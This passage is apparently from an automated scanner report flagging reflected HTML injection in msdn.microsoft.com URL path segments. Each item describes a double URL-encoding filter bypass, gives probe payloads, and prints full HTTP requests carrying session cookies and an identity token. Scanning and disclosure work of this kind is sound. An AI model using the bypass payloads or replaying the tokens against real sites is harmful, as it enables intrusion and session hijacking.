<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9ad5e"><a>9e2edfb91df/dd582937(office.11)" />
...[SNIP]...

2.51. http://msdn.microsoft.com/en-us/library/dd582937(office.11).aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582937(office.11).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58dea%2522%253e%253ca%253e93ab1411cb5 was submitted in the REST URL parameter 3. This input was echoed as 58dea"><a>93ab1411cb5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582937(office.11).aspx58dea%2522%253e%253ca%253e93ab1411cb5 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9232
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582937(office.11).aspx58dea"><a>93ab1411cb5" />
...[SNIP]...

2.52. http://msdn.microsoft.com/en-us/library/dd582938(office.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(office.11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4846e%2522%253e%253ca%253ed113f5f9538 was submitted in the REST URL parameter 1. This input was echoed as 4846e"><a>d113f5f9538 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us4846e%2522%253e%253ca%253ed113f5f9538/library/dd582938(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us4846e"><a>d113f5f9538/library/dd582938(office.11" />
...[SNIP]...

2.53. http://msdn.microsoft.com/en-us/library/dd582938(office.11 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(office.11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4c1%2522%253e%253ca%253ea9f77ed350d was submitted in the REST URL parameter 2. This input was echoed as 6f4c1"><a>a9f77ed350d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library6f4c1%2522%253e%253ca%253ea9f77ed350d/dd582938(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6f4c1"><a>a9f77ed350d/dd582938(office.11" />
...[SNIP]...

2.54. http://msdn.microsoft.com/en-us/library/dd582938(office.11 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(office.11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47a5b%2522%253e%253ca%253e22a3e17d330 was submitted in the REST URL parameter 3. This input was echoed as 47a5b"><a>22a3e17d330 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582938(office.1147a5b%2522%253e%253ca%253e22a3e17d330 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(office.1147a5b"><a>22a3e17d330" />
...[SNIP]...

2.55. http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(office.11).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feb63%2522%253e%253ca%253e27a0f0d059b was submitted in the REST URL parameter 1. This input was echoed as feb63"><a>27a0f0d059b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usfeb63%2522%253e%253ca%253e27a0f0d059b/library/dd582938(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:55:28 GMT
Content-Length: 9197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usfeb63"><a>27a0f0d059b/library/dd582938(office.11)" />
...[SNIP]...

2.56. http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(office.11).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58b3%2522%253e%253ca%253ea478026753a was submitted in the REST URL parameter 2. This input was echoed as a58b3"><a>a478026753a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/librarya58b3%2522%253e%253ca%253ea478026753a/dd582938(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
